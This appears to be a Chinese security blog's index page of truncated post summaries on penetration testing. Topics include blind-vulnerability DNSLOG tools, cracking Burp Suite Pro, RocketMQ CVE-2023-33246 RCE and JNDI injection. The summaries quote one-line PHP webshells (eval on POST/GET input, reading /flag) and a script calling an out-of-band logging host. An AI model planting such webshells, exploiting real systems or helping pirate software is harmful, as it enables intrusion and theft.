摘要:
Bridge 无回显漏洞测试辅助平台 (Spring Boot + Spring Security + Netty) 平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 https://github.com/SPuerBRead/ 阅读全文
摘要:
Burpsuit专业版安装指导(破解) 1、下载并安装Burpsuit专业版 burpsuite官网下载链接:https://portswigger.net/burp/releases 注意:下载V2022.09之前的版本,否则后面破解失败,我下载的是 V2022.8.5 下载了专业版的burpsu 阅读全文
摘要:
URL(Uniform Resource Locator,统一资源定位符),作为网络资源的标准名称,使用一系列的信息标识来帮助我们定位网络资源,同时也告诉我们如何来获取资源。 实际上,URL是URI(Uniform Resource Identifier,统一资源标识符)的子集,URI作为一个基本概 阅读全文
摘要:
一、使用XMLHttpRequest发起请求 <script> console.log("使用XMLHttpRequest发起请求"); var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://ccc.4.dns.snadfml.cn/http 阅读全文
摘要:
SVG中的<use>元素用于重用其他元素,主要用于联接<defs>和alike,而我们却用它来引用外部SVG文件中的元素元素通过其id被引用,在<use>标签的xlink:href属性中以'#'井字符开头,外部元素的引用同样如此基本结构如下所示: test.html <svg> <use xlink 阅读全文
摘要:
各种语言的一句话木马 PHP 上传xx.php 内容: 1.<?php @eval($_POST['shell']);?> 2.<?php @eval($_GET['shell']);?> 3.<?php phpinfo();?> 4.<?php readfile('/flag');?>//读取文件 阅读全文
摘要:
基础知识 Expect 是 Unix 系统中用来进行自动化控制和测试的软件工具 , 作为 Tcl 脚本语言的一个扩展,应用在交互式软件中 spawn命令启动新的进程来进行交互式的运行,spawn后的send和expect命令都是和spawn打开的进程进行交互的。 send命令接收一个字符串参数,并将 阅读全文
摘要:
JasperReport是一个强大、灵活的报表生成工具,能够展示丰富的页面内容,并将之转换成PDF、HTML、XML等格式。该库完全由Java写成,可以用于在各种Java应用程序,包括J2EE,Web应用程序中生成动态内容。JasperReports附带了报表编译器,可以在报表表达式内部使用Groo 阅读全文
摘要:
2023年5月23日, Rocketmq 爆出 CVE-2023-33246 RCE高危漏洞。 在一定条件下, 攻击者可以利用该漏洞通过更新配置功能以RocketMQ运行的系统用户身份执行命令 。 漏洞利用与复现 攻击者成功RCE需要满足以下条件 Rocketmq 版本 < 5.1.1 或 < 4. 阅读全文
摘要:
JNDI注入与高版本绕过方式 为了方便大家测试与漏洞排查,为大家总结了快速验证漏洞的各种方式 一、简单利用marshalsec快速搭建JNDI(ldap/rmi)服务 marshalsec是一款java反序列利用工具,其可以很方便的起一个ldap或rmi服务,通过这些服务来去访问攻击者准备好的恶意执 阅读全文